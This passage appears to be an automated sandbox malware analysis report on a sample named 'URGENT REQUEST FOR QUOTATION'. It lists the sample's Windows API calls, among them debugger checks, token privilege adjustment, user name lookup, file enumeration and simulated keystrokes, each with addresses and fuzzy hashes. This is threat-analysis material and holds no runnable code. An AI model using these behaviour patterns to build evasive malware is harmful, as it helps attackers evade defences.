                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2695905019-0
                                                                                                                      • Opcode ID: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                                                      • Instruction ID: e4ffe73aef33fab172df3e90f9c5bc0ea6c221d3859b5199aa57823ddc31fc77
                                                                                                                      • Opcode Fuzzy Hash: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                                                      • Instruction Fuzzy Hash: 6CF0A0B085091197AA206B78EC0DCAA77AC9F02334B144703F83AC20E0EBB45D559695
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000982AA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 670af1bddfca89b218ea029ced866c4f205935485444ba98f3681682ff4d73c0
                                                                                                                      • Instruction ID: b9b2d131ab02e176b89267a87dd80ec98be62cdd15f6605baf76ee4fac305ed8
                                                                                                                      • Opcode Fuzzy Hash: 670af1bddfca89b218ea029ced866c4f205935485444ba98f3681682ff4d73c0
                                                                                                                      • Instruction Fuzzy Hash: A5323475A006059FCB28CF59C481AAAB7F0FF48710B15C46EE59ADB3A1EB70E981DB44
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A5CC1
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A5D17
                                                                                                                      • FindClose.KERNEL32(?), ref: 000A5D5F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                                                      • Instruction ID: 30072ae2b5cbaf2666bdd022af64befb43fe4669595e3e3c7a16aa8fa64d1f33
                                                                                                                      • Opcode Fuzzy Hash: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                                                      • Instruction Fuzzy Hash: 9151AC74604A019FD724CF68C894E9AB7E4FF4A324F14855DE99A8B3A2CB30ED44CF91
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0006271A
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00062724
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00062731
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3906539128-0
                                                                                                                      • Opcode ID: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                                                      • Instruction ID: 97fe67eae1f1bf861ec7cdf1b585daeb4403c1a61fcc078f99034e33c714ee5e
                                                                                                                      • Opcode Fuzzy Hash: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                                                      • Instruction Fuzzy Hash: 0531C27490121CABDB21DF68DC89BDDBBF8AF08310F5041EAE80CA6261E7349F858F45
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A51DA
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5238
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000A52A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                                                      • Instruction ID: ada5487d4ef2401ac32852814e356de12f197dee6c7c0395b476acd7886b6c7d
                                                                                                                      • Opcode Fuzzy Hash: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                                                      • Instruction Fuzzy Hash: 6F312B75A00518DFEB00DF95D894FADBBB4FF49314F088099E809AB362DB35E855CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                                                      • GetLastError.KERNEL32 ref: 0009174A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 577356006-0
                                                                                                                      • Opcode ID: dcd49fea58195482078e1d900168c7c32af2fd1661b6c49df5119e52d27e4ceb
                                                                                                                      • Instruction ID: 6be384abe43934d8b310967a58f647a50f1ee88259a9995bf6e12eca073dbf8b
                                                                                                                      • Opcode Fuzzy Hash: dcd49fea58195482078e1d900168c7c32af2fd1661b6c49df5119e52d27e4ceb
                                                                                                                      • Instruction Fuzzy Hash: CB1191B2904306AFE7189F54EC86DAAB7F9EF44714B24852EE05657251EB70BC428A24
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D608
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0009D645
                                                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D650
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 33631002-0
                                                                                                                      • Opcode ID: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                                                      • Instruction ID: a8a006425d87557a7d75a4a2ff5e50afaa248dd72c7bdbbe8c041dc9e8c1d5c2
                                                                                                                      • Opcode Fuzzy Hash: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                                                      • Instruction Fuzzy Hash: 22116175E45228BFEB208F95EC45FAFBFBCEB45B50F108116F908E7290D6704A059BA1
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009168C
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000916A1
                                                                                                                      • FreeSid.ADVAPI32(?), ref: 000916B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      • Opcode ID: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                                                      • Instruction ID: eec54f05c84f5e6298d82c16d8878a7a6cfe457ff7e34ea699d073a1d3d1048c
                                                                                                                      • Opcode Fuzzy Hash: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                                                      • Instruction Fuzzy Hash: 3BF0F471950309FBEF00DFE4DC89EAEBBBCFB08604F504565E901E2181E774AA449A54
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D09
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D10
                                                                                                                      • ExitProcess.KERNEL32 ref: 00054D22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                                                      • Instruction ID: 0606665a2986f318c4549e5d373c6b08165cf7829483aafcaea99607fbb75cef
                                                                                                                      • Opcode Fuzzy Hash: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                                                      • Instruction Fuzzy Hash: 1EE0B631400148ABEF11AF54EE09E993B79FB41786B148018FC098B123CB3ADE86CAA0
                                                                                                                      APIs
                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0008D28C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID: X64
                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                      • Opcode ID: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                                                      • Instruction ID: a7e09d8eb9178bf21b2e3c263573a7b02a93900d1eb6aa56d3618a50eada6a3e
                                                                                                                      • Opcode Fuzzy Hash: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                                                      • Instruction Fuzzy Hash: CDD0C9B480112DEADBA0DB90EC88DDDB37CBB14305F100252F506A2040D73495488F10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                      • Instruction ID: acfec07cbdde247042bf01b9522f1f61f615afaf793eadb54fb7eb13df56bbd6
                                                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                      • Instruction Fuzzy Hash: 4C021C71E002199FEF14CFA9C884AAEBBF1EF48315F258169D819E7381D731AE45CB94
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A6918
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6961
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                                                      • Instruction ID: f682372b6bbaed95cf3608389238dfcee0e15adb55e0069f415de9f463bac683
                                                                                                                      • Opcode Fuzzy Hash: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                                                      • Instruction Fuzzy Hash: 3F11D3356042009FD710CF69C484E16BBE4FF85328F08C6A9E4698F2A2CB31EC05CB90
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37E4
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 3ada9cc4a1b29f3a07d87cbb5abb7c78ab22234fbc170140d4ccb61a0c5e80bb
                                                                                                                      • Instruction ID: 30d707e595800fcb870e2b4b9eaef7015f65e8c3b8e67aa82bf182a9068ad687
                                                                                                                      • Opcode Fuzzy Hash: 3ada9cc4a1b29f3a07d87cbb5abb7c78ab22234fbc170140d4ccb61a0c5e80bb
                                                                                                                      • Instruction Fuzzy Hash: 00F0E5B16043282AF72057A69C4DFEF3AAEEFC5761F000175F509D22D1D9A09904C6B0
                                                                                                                      APIs
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
                                                                                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0009B270
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3536248340-0
                                                                                                                      • Opcode ID: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                                                                                                      • Instruction ID: 58c7c151142fcbade6054568f2302e3c61d6002fb06dc13193f18b39192c8918
                                                                                                                      • Opcode Fuzzy Hash: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                                                                                                      • Instruction Fuzzy Hash: 01F01D7180424DABEF159FA0D805BAE7BB4FF04315F00801AF955A5191C77996119F94
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                                                      • CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 183ab0258e5080c660d000efaeb69040a8dcd6cd5e6fbb1bfb503221cdd0290a
                                                                                                                      • Instruction ID: 9726d31d16692d446cf91d00e164c386a7d9e8379784e045e86d961bd92d13ca
                                                                                                                      • Opcode Fuzzy Hash: 183ab0258e5080c660d000efaeb69040a8dcd6cd5e6fbb1bfb503221cdd0290a
                                                                                                                      • Instruction Fuzzy Hash: 23E0BF72014651AEF7252B51FC05EB777E9EB04311B24882DF5A6804B1DB626C90EB54
                                                                                                                      Strings
                                                                                                                      • Variable is not of type 'Object'., xrefs: 00080C40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                                                      • API String ID: 0-1840281001
                                                                                                                      • Opcode ID: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                                                      • Instruction ID: 276aa894707942c63ed27cb6aeb695aa7bd2cffabf56c056d04cf534c4843174
                                                                                                                      • Opcode Fuzzy Hash: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                                                      • Instruction Fuzzy Hash: 8F32AC74900218DFEF65EF94C881EEDB7B9BF05304F148069E846BB292DB75AE49CB50
                                                                                                                      APIs
                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00066766,?,?,00000008,?,?,0006FEFE,00000000), ref: 00066998
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionRaise
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3997070919-0
                                                                                                                      • Opcode ID: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
